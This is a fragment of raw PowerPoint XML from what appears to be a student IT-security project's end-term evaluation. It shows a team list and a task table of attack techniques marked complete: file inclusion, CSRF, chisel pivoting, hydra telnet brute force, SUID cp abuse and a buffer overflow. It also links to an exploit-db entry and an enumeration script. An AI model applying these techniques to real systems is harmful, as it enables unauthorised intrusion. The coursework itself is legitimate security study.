          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7367588" y="461963"/>
            <a:ext cx="1249362" cy="404812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="179" name="Google Shape;179;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="161925" y="6162675"/>
            <a:ext cx="4716463" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1495580" y="1935043"/>
            <a:ext cx="5104098" cy="1360445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="5500">
                <a:solidFill>
                  <a:srgbClr val="6DB310"/>
                </a:solidFill>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1" name="Google Shape;181;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502804" y="3295488"/>
            <a:ext cx="5104098" cy="498475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="20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2" name="Google Shape;182;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="4648200"/>
            <a:ext cx="2159000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t"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0" name="Google Shape;30;p1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6" name="Google Shape;36;p1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7" name="Google Shape;37;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2" name="Google Shape;42;p1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3" name="Google Shape;43;p1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9" name="Google Shape;49;p1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1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1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2" name="Google Shape;52;p1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3" name="Google Shape;53;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8" name="Google Shape;5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7" name="Google Shape;67;p2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8" name="Google Shape;68;p2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
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;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93" name="Google Shape;93;p1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4" name="Google Shape;94;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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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hyperlink" Target="mailto:webadmin@cool4guys.com"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10.0.0.3/linenum.sh"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hyperlink" Target="http://man7.org/linux/man-pages/man3/termios.3.html" TargetMode="External"/><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hyperlink" Target="https://www.exploit-db.com/exploits/37292" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide74.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><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9.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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0.xml"/><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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.pn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13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/></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5.xml"/><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8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6.xml"/><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8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7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.png"/></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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/></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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/></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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1981200"/>
            <a:ext cx="7781925" cy="145891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4400" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1"/>
              <a:t>End</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>-Term Evaluation </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="4343400"/>
            <a:ext cx="3048000" cy="14157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b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Project ID:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;Redacted&gt;</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">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sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Project Title:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>C200 IT Security</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="4343400"/>
            <a:ext cx="3738900" cy="1865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b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Team Members:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1 .Wafiyuddin (Leader)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Tun Siang</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>3. Justin</a:t>
            </a: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4. Irfan</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ae927e1771_0_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7782000" cy="60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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;gae927e1771_0_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>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t>Tun Siang</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-139700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="252" name="Google Shape;252;gae927e1771_0_0"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="2362200"/>
          <a:ext cx="6096000" cy="2835190"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{5830FC0F-5C3E-4966-B63A-2CCE79721B59}</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5850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Task </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Progress</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Local/Remote file inclusion (Past)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>CSRF (Past)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>pivoting (chisel)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>bruteforce hydra telnet</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>misconfiguration SUID file cp</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>bss Bufferoverflow</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
